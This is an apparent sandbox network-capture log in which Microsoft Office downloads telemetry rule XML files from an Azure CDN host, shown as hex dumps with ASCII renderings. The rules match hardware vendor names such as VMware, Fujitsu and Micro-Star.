                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:07 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    19192.168.2.64972013.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:07 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:07 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 415
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 16655d81-601e-0084-07c4-456b3f000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010007Z-1746fd949bddgsvjhC1EWRum2c00000000v0000000002fr3
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:07 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    20192.168.2.64972213.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:07 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:07 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 477
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: de914170-201e-0000-68ad-45a537000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010007Z-1746fd949bdmv56chC1EWRypnn00000000p0000000008rpx
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:07 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    21192.168.2.64972613.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:08 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:08 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 494
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 9b0204ab-501e-0047-62c1-45ce6c000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010008Z-1746fd949bd54zxghC1EWRzre400000000p000000000r4a8
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:09 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    22192.168.2.64972913.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:09 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:09 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 404
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 3f7caad5-701e-006f-6962-43afc4000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010009Z-174f7845968xr5c2hC1EWRd0hn0000000re000000000sz0t
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:09 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    23192.168.2.64972713.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:09 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:09 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 472
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: dbf7ebc2-101e-00a2-0ac7-459f2e000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010009Z-1746fd949bdlqd7fhC1EWR6vt000000000m000000000fy8k
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:09 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    24192.168.2.64972813.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:09 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:09 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 419
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9748630E"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 1b86d58a-f01e-0071-54ce-45431c000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010009Z-1746fd949bdkw94lhC1EWRxuz400000000pg000000008d78
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:09 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    25192.168.2.64973013.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:10 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:10 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 76d3483c-401e-00a3-2bcc-458b09000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010010Z-1746fd949bdkw94lhC1EWRxuz400000000ng00000000awen
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:10 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    26192.168.2.64973213.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:10 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:11 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 428
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 7732d518-401e-0035-4c64-4482d8000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010011Z-174f784596886s2bhC1EWR743w00000016s000000000bgvz
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:11 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    27192.168.2.64973413.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:11 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:12 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 415
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
